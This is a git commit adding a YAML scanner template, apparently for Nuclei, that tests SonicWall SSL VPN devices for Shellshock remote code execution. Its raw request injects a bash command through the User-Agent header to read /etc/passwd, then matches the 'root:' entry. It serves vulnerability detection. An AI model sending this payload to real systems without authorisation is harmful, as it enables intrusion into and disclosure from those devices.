New Sonicwall 0day Exploit test

patch-1
PR3R00T 2021-01-26 10:20:46 +00:00 committed by GitHub
parent 41a7be73e4
commit 45d26b875e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 28 additions and 0 deletions

View File

@ -0,0 +1,28 @@
id: sonicwall-sslvpn-shellshock
info:
name: Sonicwall SSLVPN ShellShock RCE
author: PR3R00T
severity: critical
# Reference:-
# https://twitter.com/chybeta/status/1353974652540882944/photo/1
requests:
raw:
- |
GET /cgi-bin/jarrewrite.sh HTTP/1.1
Host: {{Hostname}}
User-Agent: "() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'"
Accept: */*
Accept-Language: en
Connection: close
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
part: body
- type: status
status:
- 200